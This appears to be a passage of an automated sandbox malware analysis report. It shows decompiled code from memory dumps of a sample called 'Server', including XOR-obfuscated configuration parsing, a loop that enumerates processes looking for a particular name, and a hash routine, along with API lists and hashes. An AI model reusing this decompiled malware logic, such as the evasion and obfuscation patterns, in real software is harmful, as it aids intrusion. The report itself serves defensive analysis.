            						_t49 = 0;
            					} else {
            						_t82 =  *0x202a344; // 0x43175ac3
            						_t49 = E020236C5(_t104, _t102, _t82 ^ 0x167db74c);
            					}
            					if(_t49 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
            							 *0x202a02c = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t50 = 0;
            					} else {
            						_t78 =  *0x202a344; // 0x43175ac3
            						_t50 = E020236C5(_t104, _t102, _t78 ^ 0x02ddbcae);
            					}
            					if(_t50 == 0) {
            						L41:
            						 *0x202a2ec = 5;
            						goto L42;
            					} else {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
            							goto L41;
            						} else {
            							L42:
            							if(_t102 == 0) {
            								_t51 = 0;
            							} else {
            								_t75 =  *0x202a344; // 0x43175ac3
            								_t51 = E020236C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
            							}
            							if(_t51 != 0) {
            								_push(_t51);
            								_t72 = 0x10;
            								_t73 = E02025B85(_t72);
            								if(_t73 != 0) {
            									_push(_t73);
            									E0202607C();
            								}
            							}
            							if(_t102 == 0) {
            								_t52 = 0;
            							} else {
            								_t70 =  *0x202a344; // 0x43175ac3
            								_t52 = E020236C5(_t104, _t102, _t70 ^ 0x93710135);
            							}
            							if(_t52 != 0 && E02025B85(0, _t52) != 0) {
            								_t122 =  *0x202a3cc; // 0x2ca9600
            								E02025364(_t122 + 4, _t68);
            							}
            							if(_t102 == 0) {
            								_t53 = 0;
            							} else {
            								_t65 =  *0x202a344; // 0x43175ac3
            								_t53 = E020236C5(_t104, _t102, _t65 ^ 0x175474b7);
            							}
            							if(_t53 == 0) {
            								L59:
            								_t54 =  *0x202a348; // 0xc7d5a8
            								_t22 = _t54 + 0x202b5f3; // 0x616d692f
            								 *0x202a370 = _t22;
            								goto L60;
            							} else {
            								_t64 = E02025B85(0, _t53);
            								 *0x202a370 = _t64;
            								if(_t64 != 0) {
            									L60:
            									if(_t102 == 0) {
            										_t56 = 0;
            									} else {
            										_t61 =  *0x202a344; // 0x43175ac3
            										_t56 = E020236C5(_t104, _t102, _t61 ^ 0xf8a29dde);
            									}
            									if(_t56 == 0) {
            										_t57 =  *0x202a348; // 0xc7d5a8
            										_t23 = _t57 + 0x202b899; // 0x6976612e
            										_t58 = _t23;
            									} else {
            										_t58 = E02025B85(0, _t56);
            									}
            									 *0x202a3e0 = _t58;
            									HeapFree( *0x202a2d8, 0, _t102);
            									_v12 = 0;
            									goto L67;
            								}
            								goto L59;
            							}
            						}
            					}
            				}
            			}








































            0x02021d8a
            0x02021d8a
            0x02021d8a
            0x02021d8a
            0x02021d8d
            0x02021daa
            0x02021db8
            0x02021db8
            0x02021dbd
            0x02021dd7
            0x02022045
            0x0202204c
            0x02022050
            0x02022050
            0x02021ddd
            0x02021de2
            0x02021dfa
            0x02022032
            0x0202203c
            0x00000000
            0x02021e00
            0x02021e00
            0x02021e01
            0x02021e06
            0x02021e1c
            0x02021e08
            0x02021e08
            0x02021e15
            0x02021e15
            0x02021e1e
            0x02021e27
            0x02021e29
            0x02021e33
            0x02021e38
            0x02021e38
            0x02021e33
            0x02021e3f
            0x02021e55
            0x02021e41
            0x02021e41
            0x02021e4e
            0x02021e4e
            0x02021e59
            0x02021e5b
            0x02021e65
            0x02021e6a
            0x02021e6a
            0x02021e65
            0x02021e71
            0x02021e87
            0x02021e73
            0x02021e73
            0x02021e80
            0x02021e80
            0x02021e8b
            0x02021e8d
            0x02021e97
            0x02021e9c
            0x02021e9c
            0x02021e97
            0x02021ea3
            0x02021eb9
            0x02021ea5
            0x02021ea5
            0x02021eb2
            0x02021eb2
            0x02021ebd
            0x02021ebf
            0x02021ec9
            0x02021ece
            0x02021ece
            0x02021ec9
            0x02021ed5
            0x02021eeb
            0x02021ed7
            0x02021ed7
            0x02021ee4
            0x02021ee4
            0x02021eef
            0x02021ef1
            0x02021efb
            0x02021f00
            0x02021f00
            0x02021efb
            0x02021f07
            0x02021f1d
            0x02021f09
            0x02021f09
            0x02021f16
            0x02021f16
            0x02021f21
            0x02021f34
            0x02021f34
            0x00000000
            0x02021f23
            0x02021f23
            0x02021f2d
            0x00000000
            0x02021f3e
            0x02021f3e
            0x02021f40
            0x02021f56
            0x02021f42
            0x02021f42
            0x02021f4f
            0x02021f4f
            0x02021f5a
            0x02021f5c
            0x02021f5f
            0x02021f60
            0x02021f67
            0x02021f69
            0x02021f6a
            0x02021f6a
            0x02021f67
            0x02021f71
            0x02021f87
            0x02021f73
            0x02021f73
            0x02021f80
            0x02021f80
            0x02021f8b
            0x02021f99
            0x02021fa3
            0x02021fa3
            0x02021fab
            0x02021fc1
            0x02021fad
            0x02021fad
            0x02021fba
            0x02021fba
            0x02021fc5
            0x02021fd8
            0x02021fd8
            0x02021fdd
            0x02021fe3
            0x00000000
            0x02021fc7
            0x02021fca
            0x02021fcf
            0x02021fd6
            0x02021fe8
            0x02021fea
            0x02022000
            0x02021fec
            0x02021fec
            0x02021ff9
            0x02021ff9
            0x02022004
            0x02022010
            0x02022015
            0x02022015
            0x02022006
            0x02022009
            0x02022009
            0x02022023
            0x02022028
            0x0202202e
            0x00000000
            0x02022031
            0x00000000
            0x02021fd6
            0x02021fc5
            0x02021f2d
            0x02021f21

            APIs
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021E2F
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021E61
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021E93
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021EC5
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021EF7
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021F29
            • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02022028
            • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 0202203C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: a9ed82c16a7b06c2b18c39991836e34999a2941e54638d163e9b43420fb57a08
            • Instruction ID: fa4398070ce2ada1e03b549db445e254815189435cd5a28b28ac465ee9a655d9
            • Opcode Fuzzy Hash: a9ed82c16a7b06c2b18c39991836e34999a2941e54638d163e9b43420fb57a08
            • Instruction Fuzzy Hash: 6E819470B00324AFCB61DBB48EC8D9FB6EEAB487147750D27A509D3105EB79D95CAB20
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E020230D5() {
            				char _v264;
            				void* _v300;
            				int _t8;
            				intOrPtr _t9;
            				int _t15;
            				void* _t17;
            
            				_t15 = 0;
            				_t17 = CreateToolhelp32Snapshot(2, 0);
            				if(_t17 != 0) {
            					_t8 = Process32First(_t17,  &_v300);
            					while(_t8 != 0) {
            						_t9 =  *0x202a348; // 0xc7d5a8
            						_t2 = _t9 + 0x202be88; // 0x73617661
            						_push( &_v264);
            						if( *0x202a12c() != 0) {
            							_t15 = 1;
            						} else {
            							_t8 = Process32Next(_t17,  &_v300);
            							continue;
            						}
            						L7:
            						CloseHandle(_t17);
            						goto L8;
            					}
            					goto L7;
            				}
            				L8:
            				return _t15;
            			}









            0x020230e0
            0x020230ea
            0x020230ee
            0x020230f8
            0x02023129
            0x020230ff
            0x02023104
            0x02023111
            0x0202311a
            0x02023131
            0x0202311c
            0x02023124
            0x00000000
            0x02023124
            0x02023132
            0x02023133
            0x00000000
            0x02023133
            0x00000000
            0x0202312d
            0x02023139
            0x0202313e

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 020230E5
            • Process32First.KERNEL32(00000000,?), ref: 020230F8
            • Process32Next.KERNEL32(00000000,?), ref: 02023124
            • CloseHandle.KERNEL32(00000000), ref: 02023133
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 420147892-0
            • Opcode ID: e8cfbdffe8c25a5800aba3cbcc961cdf03b6d14205e05a5d6a7773875577978c
            • Instruction ID: d91ef9574c58af9c44046ba6d8c3cd5ea9a9eca37eb19cdfd6ad20ff99b82382
            • Opcode Fuzzy Hash: e8cfbdffe8c25a5800aba3cbcc961cdf03b6d14205e05a5d6a7773875577978c
            • Instruction Fuzzy Hash: E0F096326003745ADB31A7669C89FDB76ACEB85310F0100A3EE45D2000EB28D65DDA61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D68() {
            				void* _t1;
            				unsigned int _t3;
            				void* _t4;
            				long _t5;
            				void* _t6;
            				intOrPtr _t10;
            				void* _t14;
            
            				_t10 =  *0x404170;
            				_t1 = CreateEventA(0, 1, 0, 0);
            				 *0x40417c = _t1;
            				if(_t1 == 0) {
            					return GetLastError();
            				}
            				_t3 = GetVersion();
            				if(_t3 != 5) {
            					L4:
            					if(_t14 <= 0) {
            						_t4 = 0x32;
            						return _t4;
            					} else {
            						goto L5;
            					}
            				} else {
            					if(_t3 >> 8 > 0) {
            						L5:
            						 *0x40416c = _t3;
            						_t5 = GetCurrentProcessId();
            						 *0x404168 = _t5;
            						 *0x404170 = _t10;
            						_t6 = OpenProcess(0x10047a, 0, _t5);
            						 *0x404164 = _t6;
            						if(_t6 == 0) {
            							 *0x404164 =  *0x404164 | 0xffffffff;
            						}
            						return 0;
            					} else {
            						_t14 = _t3 - _t3;
            						goto L4;
            					}
            				}
            			}










            0x00401d69
            0x00401d77
            0x00401d7d
            0x00401d84
            0x00401ddb
            0x00401ddb
            0x00401d86
            0x00401d8e
            0x00401d9b
            0x00401d9b
            0x00401dd7
            0x00401dd9
            0x00000000
            0x00000000
            0x00000000
            0x00401d90
            0x00401d97
            0x00401d9d
            0x00401d9d
            0x00401da2
            0x00401db0
            0x00401db5
            0x00401dbb
            0x00401dc1
            0x00401dc8
            0x00401dca
            0x00401dca
            0x00401dd4
            0x00401d99
            0x00401d99
            0x00000000
            0x00401d99
            0x00401d97

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • GetVersion.KERNEL32 ref: 00401D86
            • GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: .$GetProcAddress.$l
            • API String ID: 0-2784972518
            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction ID: 4f9cfe251a72ca159fbf4fc79e39fe33bf16e20f35afd1b8c11fb9f49f0634be
            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction Fuzzy Hash: 993139B690060ADFDB10CF99C980AEDBBF5FF48724F14414AE441A7711DB71EA45CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 49%
            			E020216DF(void* __ecx, intOrPtr* _a4) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				void _v76;
            				intOrPtr* _t226;
            				signed int _t229;
            				signed int _t231;
            				signed int _t233;
            				signed int _t235;
            				signed int _t237;
            				signed int _t239;
            				signed int _t241;
            				signed int _t243;
            				signed int _t245;
            				signed int _t247;
            				signed int _t249;
            				signed int _t251;
            				signed int _t253;
            				signed int _t255;
            				signed int _t257;
            				signed int _t259;
            				signed int _t338;
            				signed char* _t348;
            				signed int _t349;
            				signed int _t351;
            				signed int _t353;
            				signed int _t355;
            				signed int _t357;
            				signed int _t359;
            				signed int _t361;
            				signed int _t363;
            				signed int _t365;
            				signed int _t367;
            				signed int _t376;
            				signed int _t378;
            				signed int _t380;
            				signed int _t382;
            				signed int _t384;
            				intOrPtr* _t400;
            				signed int* _t401;
            				signed int _t402;
            				signed int _t404;
            				signed int _t406;
            				signed int _t408;
            				signed int _t410;
            				signed int _t412;
            				signed int _t414;
            				signed int _t416;
            				signed int _t418;
            				signed int _t420;
            				signed int _t422;
            				signed int _t424;
            				signed int _t432;
            				signed int _t434;
            				signed int _t436;
            				signed int _t438;
            				signed int _t440;
            				signed int _t508;
            				signed int _t599;
            				signed int _t607;
            				signed int _t613;
            				signed int _t679;
            				void* _t682;
            				signed int _t683;
            				signed int _t685;
            				signed int _t690;
            				signed int _t692;
            				signed int _t697;
            				signed int _t699;
            				signed int _t718;
            				signed int _t720;
            				signed int _t722;
            				signed int _t724;
            				signed int _t726;
            				signed int _t728;
            				signed int _t734;
            				signed int _t740;
            				signed int _t742;
            				signed int _t744;
            				signed int _t746;
            				signed int _t748;
            
            				_t226 = _a4;
            				_t348 = __ecx + 2;
            				_t401 =  &_v76;
            				_t682 = 0x10;
            				do {
            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
            					_t401 =  &(_t401[1]);
            					_t348 =  &(_t348[4]);
            					_t682 = _t682 - 1;
            				} while (_t682 != 0);
            				_t6 = _t226 + 4; // 0x14eb3fc3
            				_t683 =  *_t6;
            				_t7 = _t226 + 8; // 0x8d08458b
            				_t402 =  *_t7;
            				_t8 = _t226 + 0xc; // 0x56c1184c
            				_t349 =  *_t8;
            				asm("rol eax, 0x7");
            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
            				asm("rol ecx, 0xc");
            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
            				asm("ror edx, 0xf");
            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
            				asm("ror esi, 0xa");
            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
            				_v8 = _t685;
            				_t690 = _v8;
            				asm("rol eax, 0x7");
            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
            				asm("rol ecx, 0xc");
            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
            				asm("ror edx, 0xf");
            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
            				asm("ror esi, 0xa");
            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
            				_v8 = _t692;
            				_t697 = _v8;
            				asm("rol eax, 0x7");
            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
            				asm("rol ecx, 0xc");
            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
            				asm("ror edx, 0xf");
            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
            				asm("ror esi, 0xa");
            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
            				_v8 = _t699;
            				asm("rol eax, 0x7");
            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
            				asm("rol ecx, 0xc");
            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
            				_t508 =  !_t357;
            				asm("ror edx, 0xf");
            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
            				_v12 = _t410;
            				_v12 =  !_v12;
            				asm("ror esi, 0xa");
            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
            				asm("rol eax, 0x5");
            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
            				asm("rol ecx, 0x9");
            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
            				asm("rol edx, 0xe");
            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
            				asm("ror esi, 0xc");
            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
            				asm("rol eax, 0x5");
            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
            				asm("rol ecx, 0x9");
            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
            				asm("rol edx, 0xe");
            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
            				asm("ror esi, 0xc");
            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
            				asm("rol eax, 0x5");
            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
            				asm("rol ecx, 0x9");
            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
            				asm("rol edx, 0xe");
            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
            				asm("ror esi, 0xc");
            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
            				asm("rol eax, 0x5");
            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
            				asm("rol ecx, 0x9");
            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
            				asm("rol edx, 0xe");
            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
            				asm("ror esi, 0xc");
            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
            				asm("rol eax, 0x4");
            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
            				asm("rol ecx, 0xb");
            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
            				asm("rol edx, 0x10");
            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
            				_t599 = _t367 ^ _t420;
            				asm("ror esi, 0x9");
            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
            				asm("rol eax, 0x4");
            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
            				asm("rol edi, 0xb");
            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
            				asm("rol edx, 0x10");
            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
            				_t338 = _t607 ^ _t422;
            				asm("ror ecx, 0x9");
            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
            				asm("rol eax, 0x4");
            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
            				asm("rol esi, 0xb");
            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
            				asm("rol edi, 0x10");
            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
            				_t424 = _t734 ^ _t613;
            				asm("ror ecx, 0x9");
            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
            				asm("rol eax, 0x4");
            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
            				asm("rol edx, 0xb");
            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
            				asm("rol esi, 0x10");
            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
            				asm("ror ecx, 0x9");
            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
            				asm("rol eax, 0x6");
            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
            				asm("rol edx, 0xa");
            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
            				asm("rol esi, 0xf");
            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
            				asm("ror ecx, 0xb");
            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
            				asm("rol eax, 0x6");
            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
            				asm("rol edx, 0xa");
            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
            				asm("rol esi, 0xf");
            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
            				asm("ror ecx, 0xb");
            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
            				asm("rol eax, 0x6");
            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
            				asm("rol edx, 0xa");
            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
            				asm("rol esi, 0xf");
            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
            				asm("ror edi, 0xb");
            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
            				asm("rol eax, 0x6");
            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
            				asm("rol edx, 0xa");
            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
            				_t400 = _a4;
            				asm("rol esi, 0xf");
            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
            				 *_t400 =  *_t400 + _t259;
            				asm("ror eax, 0xb");
            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
            				return memset( &_v76, 0, 0x40);
            			}


































































































            0x020216e2
            0x020216ed
            0x020216f0
            0x020216f3
            0x020216f4
            0x02021712
            0x02021714
            0x02021717
            0x0202171a
            0x0202171a
            0x0202171d
            0x0202171d
            0x02021720
            0x02021720
            0x02021723
            0x02021723
            0x02021740
            0x02021743
            0x02021759
            0x0202175c
            0x02021776
            0x02021779
            0x0202178f
            0x02021792
            0x02021794
            0x020217ac
            0x020217af
            0x020217b2
            0x020217ca
            0x020217cd
            0x020217e7
            0x020217ea
            0x02021800
            0x02021803
            0x02021805
            0x0202181d
            0x02021822
            0x02021825
            0x0202183b
            0x0202183e
            0x02021858
            0x0202185b
            0x02021871
            0x02021874
            0x02021876
            0x02021891
            0x02021894
            0x020218ab
            0x020218ae
            0x020218b2
            0x020218cb
            0x020218ce
            0x020218d0
            0x020218d3
            0x020218ee
            0x020218f1
            0x0202190a
            0x0202190d
            0x0202191d
            0x02021920
            0x02021938
            0x0202193b
            0x02021955
            0x02021958
            0x02021970
            0x02021973
            0x02021989
            0x0202198c
            0x020219a4
            0x020219a7
            0x020219bf
            0x020219c2
            0x020219dc
            0x020219df
            0x020219f5
            0x020219f8
            0x02021a10
            0x02021a13
            0x02021a2d
            0x02021a30
            0x02021a48
            0x02021a4b
            0x02021a61
            0x02021a64
            0x02021a7c
            0x02021a7f
            0x02021a97
            0x02021a9a
            0x02021aac
            0x02021aaf
            0x02021ac1
            0x02021ac4
            0x02021ad6
            0x02021ad9
            0x02021add
            0x02021aed
            0x02021af0
            0x02021afe
            0x02021b01
            0x02021b13
            0x02021b16
            0x02021b2a
            0x02021b2d
            0x02021b2f
            0x02021b3f
            0x02021b42
            0x02021b54
            0x02021b57
            0x02021b65
            0x02021b68
            0x02021b7a
            0x02021b7d
            0x02021b81
            0x02021b91
            0x02021b94
            0x02021ba6
            0x02021ba9
            0x02021bb7
            0x02021bba
            0x02021bcc
            0x02021bcf
            0x02021be1
            0x02021be4
            0x02021bf8
            0x02021bfb
            0x02021c0f
            0x02021c12
            0x02021c26
            0x02021c29
            0x02021c3d
            0x02021c40
            0x02021c54
            0x02021c57
            0x02021c6b
            0x02021c70
            0x02021c82
            0x02021c85
            0x02021c99
            0x02021c9c
            0x02021cb0
            0x02021cb3
            0x02021cc9
            0x02021ccc
            0x02021ce0
            0x02021ce3
            0x02021cf5
            0x02021cf8
            0x02021d0c
            0x02021d0f
            0x02021d23
            0x02021d26
            0x02021d3a
            0x02021d43
            0x02021d46
            0x02021d4f
            0x02021d58
            0x02021d60
            0x02021d68
            0x02021d72
            0x02021d87

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: memset
